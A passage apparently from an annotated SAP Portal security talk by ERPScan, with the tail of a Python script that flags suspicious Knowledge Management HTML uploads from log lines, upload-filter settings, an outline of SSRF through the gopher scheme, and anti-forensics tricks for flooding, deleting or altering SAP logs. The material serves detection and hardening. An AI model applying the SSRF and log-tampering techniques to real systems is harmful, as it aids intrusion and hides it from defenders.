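                      if timedelta(0) <= e["ts"] - t <= WINDOW]
            if recent:
                alerts.append({"kind": "KM_HTML_UPLOAD", "ip": e["ip"],
                               "tool": "Knowledge Management", "ts": e["ts"].isoformat()})
    return alerts


# Lines from slides 73 and 49 plus one constructed benign request.
SAMPLE_LINES = [
    "[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968",
    "[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165",
    "[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110",
    "[Apr 10, 2013 2:30:00 AM ] - 192.168.192.40 : GET /irj/portal HTTP/1.1 200 4120",
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_LINES):
        print(a["ts"], a["ip"], a["kind"], a["tool"])
```

The slides' false positives apply unchanged: a new legitimate user or a user who cleared the cache produces the same icon loads, so each alert is a lead to correlate with that user's activity, not a verdict.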

  • Slide 74: Malicious file upload: Prevention

    Enable File Extension and Size Filter:
      System Administration > System Configuration > Content Management > Repository Filters > Show Advanced Options > File Extension and Size Filter
    Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter

  • Slide 75: Malicious file upload: Prevention

    Enable Malicious Script Filter:
      System Administration > System Configuration > Content Management > Repository Filters > Show Advanced Options > Malicious Script Filter
    The filter also detects executable scripts in files that are being modified and encodes them when they are saved
    Enable Forbidden Scripts: a comma-separated list of banned script tags that will be encoded when the filter is applied
    Enable the Send E-Mail to Administrator option

  • Slide 76: Portal post-exploitation

    Lots of links to other systems in the corporate LAN
    Using SSRF, attackers can get access to these systems
    What is SSRF?

  • Slide 77: SSRF History: Basics

    We send Packet A to Service A
    Service A initiates Packet B to Service B
    Services can be on the same or different hosts
    We can manipulate some fields of Packet B within Packet A
    Various SSRF attacks depend on how many fields we can control in Packet B

  • Slide 78: Partial Remote SSRF: HTTP attacks on other services

    [Diagram: a direct attack (GET /vuln.jsp) against an HTTP server in the corporate network, versus an SSRF attack in which the same request is relayed through another service; labels A, B, "Get /vuln.jst"]

  • Slide 79: Gopher uri scheme

    Using the gopher:// uri scheme, it is possible to send TCP packets
      Exploit OS vulnerabilities
      Exploit old SAP application vulnerabilities
      Bypass SAP security restrictions
      Exploit vulnerabilities in local services
    More info in our BH2012 presentation: SSRF vs. Business Critical Applications
    http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf
  • Slide 80: Portal post-exploitation

  • Slide 81: Anti-forensics

  • Slide 82: Anti-forensics

    Flooding
    Deleting
    Changing

  • Slide 83: Anti-forensics: Log flooding

    5 active logs
    Maximum log file size is 10 Mb
    Archiving when all logs reach the maximum size
    If file.0.log reaches max size, then open file.1.log
    If file.4.log reaches max size, then zip all and backup
    Rewriting the same files after archiving

  • Slide 84: Anti-forensics

    Log deleting
      SAP locks write access to only the one active log
      SAP allows reading/writing logs, so it is possible to delete them
      It could compromise the attacker's presence
    Log changing
      SAP locks write access only to the one active log
      It is possible to write into any other log file

  • Slide 85: Securing SAP Portal

    Patching
    Secure configuration
    Enabling HTTP Trace with masking
    Malicious script filter
    Log archiving: additional place for log storage
    Monitoring of security events: own scripts, parse common patterns
    ERPScan has all existing web vulns/0-day patterns

  • Slide 86: Future work

  • Slide 87

    I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
    July 31: BlackHat (Las Vegas, USA)

  • Slide 88: Contacts

    Web: www.erpscan.com
    e-mail: [email protected]
    Twitter: @erpscan, @_chipik, @neyolov